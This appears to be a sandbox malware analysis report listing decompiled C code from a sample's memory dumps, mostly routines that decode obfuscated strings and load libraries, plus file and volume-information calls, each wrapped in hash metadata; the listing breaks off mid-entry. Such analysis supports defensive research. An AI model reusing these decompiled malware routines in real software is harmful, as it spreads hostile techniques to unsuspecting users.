                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ChangeCloseCreateFindInfoNotificationSystemThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 908986755-0
                                                                                                                                                            • Opcode ID: a2687a02d976ee8a5cd8e505380b1c444c70043067e081e2da40405f12ca37f2
                                                                                                                                                            • Instruction ID: 8c3d3c3310190faf6067c5993102d1446f44c0ed736595b4113dae8a61235d69
                                                                                                                                                            • Opcode Fuzzy Hash: a2687a02d976ee8a5cd8e505380b1c444c70043067e081e2da40405f12ca37f2
                                                                                                                                                            • Instruction Fuzzy Hash: 86F0A772E04208BF97042AB6EC80F7BBB9DDA452F9310493EB51AC2061D534DC818971
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C326E, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C326E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t10;
				long _t11;
				intOrPtr _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t16 = _t17 + 0x15c;
				 *((intOrPtr*)(_t17 + 0x150)) = 1;
				 *((intOrPtr*)(_t17 + 0x154)) = _a12;
				_t10 = E009C75CC(_t17, _t17 + 0x15c,  *((intOrPtr*)(_t17 + 0x158))); // executed
				_t19 = _t18 + 0xc;
				while(_t10 == 0) {
					_t11 = RtlGetLastWin32Error();
					if(_t11 != 0x3e5) {
						if(_t11 == 0x26) {
							return E009C2EB9(_a4, _t17);
						}
						E009C568D(_t11, 0x64);
						_t10 = E009C75CC(_t17, _t16,  *((intOrPtr*)(_t17 + 0x158)));
						_t19 = _t19 + 0x10;
						continue;
					}
					return _t11;
				}
				return _t10;
			}








                                                                                                                                                            0x009c3275
                                                                                                                                                            0x009c327f
                                                                                                                                                            0x009c3285
                                                                                                                                                            0x009c3291
                                                                                                                                                            0x009c3297
                                                                                                                                                            0x009c329c
                                                                                                                                                            0x009c32c9
                                                                                                                                                            0x009c32a1
                                                                                                                                                            0x009c32ab
                                                                                                                                                            0x009c32b0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c32d9
                                                                                                                                                            0x009c32b4
                                                                                                                                                            0x009c32c1
                                                                                                                                                            0x009c32c6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c32c6
                                                                                                                                                            0x009c32dd
                                                                                                                                                            0x009c32dd
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C75CC: ReadFile.KERNEL32(?,?,009C367E,00000000,?,?,009C329C,?,?), ref: 009C75DE
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C32A1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastReadWin32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3522703849-0
                                                                                                                                                            • Opcode ID: 32ef54ea6d84ed07fcef793713542cd5c15cb88334393cc56d80574883b6f5ea
                                                                                                                                                            • Instruction ID: b233dff5ef02eb9948cfee6212b47cf1262d0aa58cb378ddb661e008d1a4d5aa
                                                                                                                                                            • Opcode Fuzzy Hash: 32ef54ea6d84ed07fcef793713542cd5c15cb88334393cc56d80574883b6f5ea
                                                                                                                                                            • Instruction Fuzzy Hash: D7F02B32D04B40ABDF202FA89C09FCB77ACDFCA710F00881EF92956240D67172448BA3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C756B, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C756B(intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28) {
				void* _t17;
				intOrPtr _t18;
				intOrPtr _t27;

				_t27 = _a4;
				 *((intOrPtr*)(_t27 + 0xc)) = 0;
				 *((intOrPtr*)(_t27 + 8)) = 0;
				_t17 = CreateFileW(_a8, _a20, _a24, 0, _a28, 0x48000000, 0); // executed
				 *(_t27 + 0x14) = _t17;
				if(_t17 != 0xffffffff) {
					_t18 = E009C6202(_a8);
					 *((intOrPtr*)(_t27 + 0x18)) = _t18;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t27 + 0x20)) = _a12;
						 *((intOrPtr*)(_t27 + 0x24)) = _a16;
						return 1;
					}
					E009C4B21( *(_t27 + 0x14));
				}
				return 0;
			}






                                                                                                                                                            0x009c756f
                                                                                                                                                            0x009c757d
                                                                                                                                                            0x009c7584
                                                                                                                                                            0x009c758d
                                                                                                                                                            0x009c7593
                                                                                                                                                            0x009c7599
                                                                                                                                                            0x009c75a2
                                                                                                                                                            0x009c75a7
                                                                                                                                                            0x009c75ad
                                                                                                                                                            0x009c75bd
                                                                                                                                                            0x009c75c3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c75c8
                                                                                                                                                            0x009c75b2
                                                                                                                                                            0x009c75b7
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNEL32(C0000000,?,00000000,00000000,009C3094,48000000,00000000,00000000,?,009C3094,00000000,?,?,00000000,C0000000,00000000), ref: 009C758D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: 1064252c72c8d3a74346795ec60234fffa3ad5bf0061c581b8b71de59b6015e7
                                                                                                                                                            • Instruction ID: 896a89a8ac12d80b1c8aaf710fc05eab23c0d471a91ec7d10446c9202bae4fb1
                                                                                                                                                            • Opcode Fuzzy Hash: 1064252c72c8d3a74346795ec60234fffa3ad5bf0061c581b8b71de59b6015e7
                                                                                                                                                            • Instruction Fuzzy Hash: 08011DB5914649AFDB209F64EC00AAABBE9FF08320B104A2AFC56C2650E331E9509F51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C569B, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                            			E009C569B() {
				long _v8;
				signed int _t9;
				WCHAR* _t16;

				_t16 = E009C5BD3();
				_t7 = 0;
				if(_t16 != 0) {
					_t16[3] = 0;
					_t9 = GetVolumeInformationW(_t16, 0, 0,  &_v8, 0, 0, 0, 0); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t9;
					E009C47F8(_t16);
					_t7 = _v8;
				}
				return _t7;
			}






                                                                                                                                                            0x009c56a5
                                                                                                                                                            0x009c56a7
                                                                                                                                                            0x009c56ab
                                                                                                                                                            0x009c56af
                                                                                                                                                            0x009c56be
                                                                                                                                                            0x009c56c7
                                                                                                                                                            0x009c56c9
                                                                                                                                                            0x009c56cc
                                                                                                                                                            0x009c56d1
                                                                                                                                                            0x009c56d4
                                                                                                                                                            0x009c56d9

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C5BD3: GetWindowsDirectoryW.KERNEL32(00000000,00000000,00000000,009C56A5,00000000,00000022,?,009C4F40,00000000,0000000A), ref: 009C5BD8
                                                                                                                                                            • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000022,?,009C4F40,00000000,0000000A), ref: 009C56BE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DirectoryInformationVolumeWindows
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3487004747-0
                                                                                                                                                            • Opcode ID: ba7fc903692a85d8148d73128d1006476f979b41fa85257fe1f7691948472af6
                                                                                                                                                            • Instruction ID: 54ef3c5418fb2fa905c895d814616a560f284c29d56473844449a8ecddc0376e
                                                                                                                                                            • Opcode Fuzzy Hash: ba7fc903692a85d8148d73128d1006476f979b41fa85257fe1f7691948472af6
                                                                                                                                                            • Instruction Fuzzy Hash: 57E06D7292A518BBA708D7A4DC0BDFF739CDE01211311425EF805D2101F6A4BE0002A5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C6F1E, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6F1E() {
				char _v5;
				char _v12;
				struct HINSTANCE__* _t8;

				E009C5DE2(0x9d12d0, 0x82f, 0xa, 7,  &_v12);
				_v5 = 0;
				E009C707D(0x5e69269d);
				_t8 = LoadLibraryA( &_v12); // executed
				return _t8;
			}






                                                                                                                                                            0x009c6f35
                                                                                                                                                            0x009c6f3d
                                                                                                                                                            0x009c6f4a
                                                                                                                                                            0x009c6f50
                                                                                                                                                            0x009c6f55

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 47e719941a4bcb1f0a79dfbfeddcb0e565c8c0c75dc7e12ca83df66429ddab18
                                                                                                                                                            • Instruction ID: 6ea150b12d8b28462763b993973a90f77432290fc29a503110bc7397b327c8be
                                                                                                                                                            • Opcode Fuzzy Hash: 47e719941a4bcb1f0a79dfbfeddcb0e565c8c0c75dc7e12ca83df66429ddab18
                                                                                                                                                            • Instruction Fuzzy Hash: D2D0C266D843083AE610E6D08C03FAD775CDB41700F0001A9BA05A51C1E8A2A60487F3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C728F, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C728F() {
				char _v5;
				char _v16;
				struct HINSTANCE__* _t8;

				E009C5DE2(0x9d12d0, 0x604, 0xf, 0xb,  &_v16);
				_v5 = 0;
				E009C707D(0x5e69269d);
				_t8 = LoadLibraryA( &_v16); // executed
				return _t8;
			}






                                                                                                                                                            0x009c72a7
                                                                                                                                                            0x009c72af
                                                                                                                                                            0x009c72bc
                                                                                                                                                            0x009c72c2
                                                                                                                                                            0x009c72c7

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: e251dd75037edce9b9c6a655b74897b96518aa44e4c05bd3b5162514b6cf650a
                                                                                                                                                            • Instruction ID: 8b189a231c220a8115bb6cc11923d1c92cc52d44bc696b2f340e042c501c9508
                                                                                                                                                            • Opcode Fuzzy Hash: e251dd75037edce9b9c6a655b74897b96518aa44e4c05bd3b5162514b6cf650a
                                                                                                                                                            • Instruction Fuzzy Hash: 81D05B55D8434C36E630F6E45C07F6D735C8B51704F4041A5BE14E51C1EDB2961487E3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C6EA0, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6EA0() {
				char _v5;
				char _v16;
				struct HINSTANCE__* _t8;

				E009C5DE2(0x9d12d0, 0x534, 0xe, 0xb,  &_v16);
				_v5 = 0;
				E009C707D(0x5e69269d);
				_t8 = LoadLibraryA( &_v16); // executed
				return _t8;
			}






                                                                                                                                                            0x009c6eb8
                                                                                                                                                            0x009c6ec0
                                                                                                                                                            0x009c6ecd
                                                                                                                                                            0x009c6ed3
                                                                                                                                                            0x009c6ed8

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 21c53826e73c99780e8442f7fae94c33fecd20d00e0d3e3da2fa6749f626f059
                                                                                                                                                            • Instruction ID: 4f6dc8a941261e70b6e29a800923dfcce2e17de2c5bf658fcaa7eab4d0790849
                                                                                                                                                            • Opcode Fuzzy Hash: 21c53826e73c99780e8442f7fae94c33fecd20d00e0d3e3da2fa6749f626f059
                                                                                                                                                            • Instruction Fuzzy Hash: 4FD01255D8434C36E620F6E4AC07F5D735C8B50744F404195BA14E51C1E9B1A6148BE3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C721D, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C721D() {
				char _v8;
				char _v20;
				struct HINSTANCE__* _t8;

				E009C5DE2(0x9d12d0, 0x3f7, 5, 0xc,  &_v20);
				_v8 = 0;
				E009C707D(0x5e69269d);
				_t8 = LoadLibraryA( &_v20); // executed
				return _t8;
			}






                                                                                                                                                            0x009c7235
                                                                                                                                                            0x009c723d
                                                                                                                                                            0x009c724a
                                                                                                                                                            0x009c7250
                                                                                                                                                            0x009c7255

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 71d7cae8e99da20d45a1f3544b95a1b34be0e0e975b6b2bb174a2511073109b3
                                                                                                                                                            • Instruction ID: 8fcce906a693f7bdecd6bfdf58c6d9be0c36c6b171ba8d1000c62cb3bc58c253
                                                                                                                                                            • Opcode Fuzzy Hash: 71d7cae8e99da20d45a1f3544b95a1b34be0e0e975b6b2bb174a2511073109b3
                                                                                                                                                            • Instruction Fuzzy Hash: DCD01255D8424D77E710F6E45C0BF7E775CDB40700F450599BA14A61C2E9A1961487A3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C7256, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7256() {
				char _v5;
				char _v16;
				struct HINSTANCE__* _t8;

				E009C5DE2(0x9d12d0, 0x3dd, 8, 0xb,  &_v16);
				_v5 = 0;
				E009C707D(0x5e69269d);
				_t8 = LoadLibraryA( &_v16); // executed
				return _t8;
			}






                                                                                                                                                            0x009c726e
                                                                                                                                                            0x009c7276
                                                                                                                                                            0x009c7283
                                                                                                                                                            0x009c7289
                                                                                                                                                            0x009c728e

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 453862d70e044f3766d3a873356827b57bd7d6ee718d358cbdd52f142b63ee52
                                                                                                                                                            • Instruction ID: 5f62b576872f8252ac1c4584768ed8674bdc918984eb366920eb0e3681a3e296
                                                                                                                                                            • Opcode Fuzzy Hash: 453862d70e044f3766d3a873356827b57bd7d6ee718d358cbdd52f142b63ee52
                                                                                                                                                            • Instruction Fuzzy Hash: 7DD05B55D8434C37E621F6E46C07F5D735C9B50700F404195BE14E51C1EDE1A61887E3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C6E67, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C6E67() {
				char _v8;
				char _v20;
				struct HINSTANCE__* _t8;

				E009C5DE2(0x9d12d0, 0x216, 4, 0xc,  &_v20);
				_v8 = 0;
				E009C707D(0x5e69269d);
				_t8 = LoadLibraryA( &_v20); // executed
				return _t8;
			}






                                                                                                                                                            0x009c6e7f
                                                                                                                                                            0x009c6e87
                                                                                                                                                            0x009c6e94
                                                                                                                                                            0x009c6e9a
                                                                                                                                                            0x009c6e9f

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: fdae2b3855f203940ae8068327db5fe94288019f05903ab7663a5d0b7e8478b4
                                                                                                                                                            • Instruction ID: 5b72aa2d4099ae72299350a968bfeece9208115c82fcd43e5f129440cc6eaf65
                                                                                                                                                            • Opcode Fuzzy Hash: fdae2b3855f203940ae8068327db5fe94288019f05903ab7663a5d0b7e8478b4
                                                                                                                                                            • Instruction Fuzzy Hash: B1D0C261D8024C76E720FAE44C07FBE735C9B40700F400199BA14A61C2E9B1951087A3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C7301, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7301() {
				char _v5;
				char _v16;
				struct HINSTANCE__* _t8;

				E009C5DE2(0x9d12d0, 0x55e, 4, 0xb,  &_v16);
				_v5 = 0;
				E009C707D(0x5e69269d);
				_t8 = LoadLibraryA( &_v16); // executed
				return _t8;
			}






                                                                                                                                                            0x009c7319
                                                                                                                                                            0x009c7321
                                                                                                                                                            0x009c732e
                                                                                                                                                            0x009c7334
                                                                                                                                                            0x009c7339

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 1ac93c8163f534f67972bafc3595df03f1b104d090792a726a2ae6fadad2e4a9
                                                                                                                                                            • Instruction ID: 88f39f81fabee933d1ef17522849924e09fab3e550f728874d63f9500a3c1baa
                                                                                                                                                            • Opcode Fuzzy Hash: 1ac93c8163f534f67972bafc3595df03f1b104d090792a726a2ae6fadad2e4a9
                                                                                                                                                            • Instruction Fuzzy Hash: 46D05B55D8434C37E620FAE45C07F5D735C8B40714F404195BF14E51C1E9B2971487E3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C733A, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C733A() {
				char _v7;
				char _v16;
				struct HINSTANCE__* _t8;

				E009C5DE2(0x9d12d0, 0x6de, 6, 9,  &_v16);
				_v7 = 0;
				E009C707D(0x5e69269d);
				_t8 = LoadLibraryA( &_v16); // executed
				return _t8;
			}






                                                                                                                                                            0x009c7352
                                                                                                                                                            0x009c735a
                                                                                                                                                            0x009c7367
                                                                                                                                                            0x009c736d
                                                                                                                                                            0x009c7372

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 91aef9fdae6fba0f302109388241b55c85836ef7ee104aa29711c72b413082c3
